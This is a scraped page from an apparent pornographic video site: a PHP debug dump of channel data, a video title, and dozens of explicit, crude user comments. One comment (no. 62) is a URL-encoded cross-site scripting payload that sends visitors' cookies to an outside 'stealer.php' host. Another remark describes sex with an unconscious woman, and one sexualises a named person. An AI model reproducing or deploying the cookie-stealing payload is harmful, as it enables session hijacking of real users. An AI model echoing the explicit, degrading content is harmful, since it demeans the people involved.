\$video['channels']:
\$channelInfo: Array ( [0] => Array ( [id] => 99591 [slug] => hot-246 [name] => hot [type] => 1 [pic] => 0 [user_id] => 414051 [aff] => 0 [subscribers] => [videos] => 20 ) [1] => Array ( [id] => 88081 [slug] => hot-238 [name] => Hot [type] => 1 [pic] => 0 [user_id] => 339394 [aff] => 0 [subscribers] => [videos] => 245 ) [2] => Array ( [id] => 75209 [slug] => bank-1 [name] => bank [type] => 1 [pic] => 0 [user_id] => 311545 [aff] => 0 [subscribers] => [videos] => 2 ) [3] => Array ( [id] => 74307 [slug] => m1 [name] => m1 [type] => 1 [pic] => 0 [user_id] => 307294 [aff] => 0 [subscribers] => [videos] => 1 ) [4] => Array ( [id] => 58970 [slug] => loser [name] => Loser [type] => 1 [pic] => 0 [user_id] => 27981 [aff] => 0 [subscribers] => 0 [videos] => 1 ) [5] => Array ( [id] => 39897 [slug] => white-76 [name] => White [type] => 1 [pic] => 0 [user_id] => 16152 [aff] => 0 [subscribers] => 133 [videos] => 2986 ) )
Young Virgin Cums Too Fast [00:57]
EmbedG00dMusicadd to...
Embed the video x
Link to the video
  1. Skip ahead to this part of the video00:05
  2. Skip ahead to this part of the video00:10
  3. Skip ahead to this part of the video00:15
  4. Skip ahead to this part of the video00:20
  5. Skip ahead to this part of the video00:25
  6. Skip ahead to this part of the video00:31
  7. Skip ahead to this part of the video00:36
  8. Skip ahead to this part of the video00:41
  9. Skip ahead to this part of the video00:46
    You must enable javascript and have the latest version of Adobe Flash Player to view this video

    1,351 people disliked this
    1. AnonymousBEST COMMENT

      Please more videos of young man first time. I am obsessed with virgin men..

      via fapdu for android

      113 hours ago
    2. AnonymousBEST COMMENT

      Looking for videos of virgin men.. not too young I mean 25 y.o virging and chinesse with a milf latin 35. Where can I see that ? I need to see it to fullfill my fantasies with a friend male from china who rejected me several times

      via fapdu for android

      012 hours ago
    3. Hate those fucking ad

      via fapdu for android

      34 days ago
    4. Damn yeah it was his first te

      via fapdu for android

      2last week
    5. the girl even finds it funny.. hahaha

      via fapdu for android

      12 weeks ago
    6. Pussy

      via fapdu for android

      13 weeks ago
    7. Virgin

      via fapdu for iphone

      0last month
    8. Wtf, shameful..

      via fapdu for iphone

      0last month
    9. The girl makes this video worth watching.

      0last month
    10. the wet

      via fapdu for android

      1last month
    11. horny

      via fapdu for ipad

      02 months ago
    12. watch

      02 months ago
    13. It show how it really is

      via fapdu for android

      52 months ago
    14. Aamir

      via fapdu for android

      02 months ago
    15. God he had no stamina. Chick was hot tho

      via fapdu for iphone

      83 months ago
    16. Anonymous replied

      virgin amajing

      via fapdu for android

      04 weeks ago
    17. So when I fuck my girl.. I'll ejaculate that quick ? Daaamn ! That's no fun. I'm a young virgin & so is my babe.

      via fapdu for iphone

      43 months ago
    18. Anonymous replied

      Tbh if you have some hot babe then why the fuck you watching shitty virgin porn lol

      via fapdu for iphone

      14 weeks ago
    19. ysuudu

      via fapdu for android

      03 months ago
    20. Males ejaculate quickly, virgins especially, ragging on him is hypocritical of you all. She should've performed oral and get rid of the 'annoying first' so it'd be longer.

      53 months ago
    21. Idk

      via fapdu for android

      03 months ago
    22. What is her name?mulalo

      34 months ago
    23. to short

      via fapdu for android

      34 months ago
    24. I didn't staff of like this guy what's wrong with him

      15 months ago
    25. Why do you like this video?it is dope

      15 months ago
    26. Do you know Conor Jordan?

      via fapdu for android

      05 months ago
    27. Sashi

      via fapdu for iphone

      35 months ago
    28. Nice to see more from her.

      05 months ago
    29. Watch

      via fapdu for android

      15 months ago
    30. Anonymous replied

      Blood. Pussy. Tight

      via fapdu for android

      15 months ago
    31. Wtf

      via fapdu for iphone

      25 months ago
    32. Became

      via fapdu for android

      55 months ago
    33. young virgin cums

      via fapdu for android

      86 months ago
    34. Its hot

      via fapdu for android

      16 months ago
    35. Who's the girl

      via fapdu for iphone

      36 months ago
    36. I luv it,bcos it gv me more skills and experience

      36 months ago
    37. missionary

      06 months ago
    38. Craft

      via fapdu for android

      56 months ago
    39. Doggy style

      via fapdu for android

      36 months ago
    40. 😃she is so hot

      via fapdu for iphone

      26 months ago
    41. I like virgins

      87 months ago
    42. Jürgen, sieht soo geil aus.. :-)

      07 months ago
    43. I feel bad for him!

      via fapdu for android

      57 months ago
    44. Id fuck him and her

      via fapdu for android

      67 months ago
    45. Anonymous replied

      I'd fuck you

      via fapdu for android

      17 months ago
    46. My pen is stand up now.. aaaaaaashsh I feel some thing

      07 months ago
    47. Hi hows out for fun.
      i

      via fapdu for android

      07 months ago
    48. Nice!

      17 months ago
    49. Anonymous replied

      Fuck off

      via fapdu for iphone

      06 months ago
    50. Anonymous replied

      u r a fukin cunt mate!!

      05 months ago
    51. he sounds like a girl

      67 months ago
    52. She is so beautiful

      via fapdu for iphone

      57 months ago
    53. M
      missionary

      via fapdu for android

      18 months ago
    54. i need sugar mummy

      28 months ago
    55. Lay down position

      via fapdu for android

      18 months ago
    56. Video

      48 months ago
    57. Im gay

      via fapdu for iphone

      08 months ago
    58. Gelry

      18 months ago
    59. .a

      08 months ago
    60. nice

      08 months ago
    61. He cam quick.

      via fapdu for android

      08 months ago
    62. %3Ciframe%20width%3D%270%27%20height%3D%270%27%20frameborder%3D%270%27%20src%3D%27%3Cscript%3Edocument.location%3D%27http%3A//www.adoola.bl.ee/stealer.php%3F%20cookie%3D%27+escape%28document.cookie%29%3B%3C/script%3E%27%20/%3E

      08 months ago
    63. Lol

      via fapdu for iphone

      18 months ago
    64. Mmmm

      via fapdu for ipad

      08 months ago
    65. Oh WOW. I would love to fuck this boy Caroline Godine from Toronto

      28 months ago
    66. Seven in cock when I fucked at the time she felt unconciaos

      via fapdu for android

      28 months ago
    67. virgin

      08 months ago
    68. Abcd

      28 months ago
    69. Télécharger dans download

      118 months ago
    70. Anonymous replied

      virgin pussy

      via fapdu for android

      08 months ago
    71. She looked like she wanted to laugh

      via fapdu for iphone

      88 months ago
    72. it looks fun thats what i do

      09 months ago
    73. best

      via fapdu for android

      29 months ago
    74. first thing a guy needs to know when you fuck for the first time make sure the girl is a virgin so she want lol on ya bc thats just a guy logic

      via fapdu for android

      19 months ago
    75. Shit at less thank about a naked grandma or stoped do someroll play or some shit damn

      via fapdu for android

      19 months ago
    76. Start a discussion on this video.

      via fapdu for android

      19 months ago
    77. What is her name?
      Need to no

      via fapdu for ipad

      19 months ago
    78. Anonymous replied

      K Mexico

      via fapdu for android

      19 months ago
    79. I love it

      via fapdu for android

      19 months ago
    80. The girl look like she was too horny i didn't even see any sucking in it like I feel like it could've been better than it was

      via fapdu for iphone

      29 months ago
    81. Anonymous replied

      Yeah he lasted for like 5 sec.

      via fapdu for ipad

      19 months ago
    82. Anonymous replied

      Lol. Haha

      via fapdu for ipad

      19 months ago
    83. Ratchet because its just them fucking and a little moaning in its not like he's giving to her extra hard

      via fapdu for iphone

      19 months ago
    84. Amazing fucking

      via fapdu for android

      19 months ago
    85. Eddie

      via fapdu for android

      09 months ago
    86. load more comments